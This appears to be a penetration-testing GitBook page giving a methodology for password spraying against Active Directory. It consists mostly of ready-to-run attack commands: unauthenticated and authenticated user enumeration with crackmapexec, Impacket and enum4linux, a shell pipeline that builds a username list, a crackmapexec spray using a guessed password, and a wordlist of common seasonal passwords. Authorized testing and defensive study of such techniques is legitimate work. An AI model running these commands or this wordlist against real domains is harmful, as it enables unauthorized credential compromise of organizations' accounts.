Password Spraying

Methodology for performing password spraying attacks against active directory

PreviousPassword Policy NextReconnaissance

Last updated 1 year ago

Password Spraying

Methodology for performing password spraying attacks against active directory

This section contains some of my methodology and tips for performing password spraying attacks against Active Directory. Before spraying, I highly recommend that you first on the domain so that you don't lock out accounts.

If you are looking to password spray external services to gain initial access, refer to the of this GitBook.

Get List of Users

# Get List of Users with CrackMapExec via RID Cycling (Unauthenticated)
crackmapexec smb $dc -u '' -p '' --users
crackmapexec smb $dc -u '' -p '' --groups

# Get List of Users with CrackMapExec via RID Cycling
crackmapexec smb $dc -u $username -p $password --users

# Get List of Users with Impacket
GetADUsers.py $domain/$username:$password -all -dc-ip $dc

# Get List of Users with Enum4linux
enum4linux $dc -u $username -p $password -U

# Sort Usernames Obtained from Enum4Linux
cat usernameenum.txt | grep "user" | awk {'print $1'} | cut -d '[' -f 2 | cut -d ']' -f 1 | sort -u -f > UsernameList.txt

Spraying

# Spray with CrackMapExec
crackmapexec smb $ip -u $username_list -p Winter2022! --continue-on-success

Password List

Password1
Hello123
password
Welcome1
Acme@1
training
Password123
job12345
food1234
June2022
July2022
August22
August2022
Summer22
Summer2022
June2022!
July2022!
August22!
August2022!
Summer22!
Summer2022!

References

PreviousPassword Policy NextReconnaissance

Last updated 1 year ago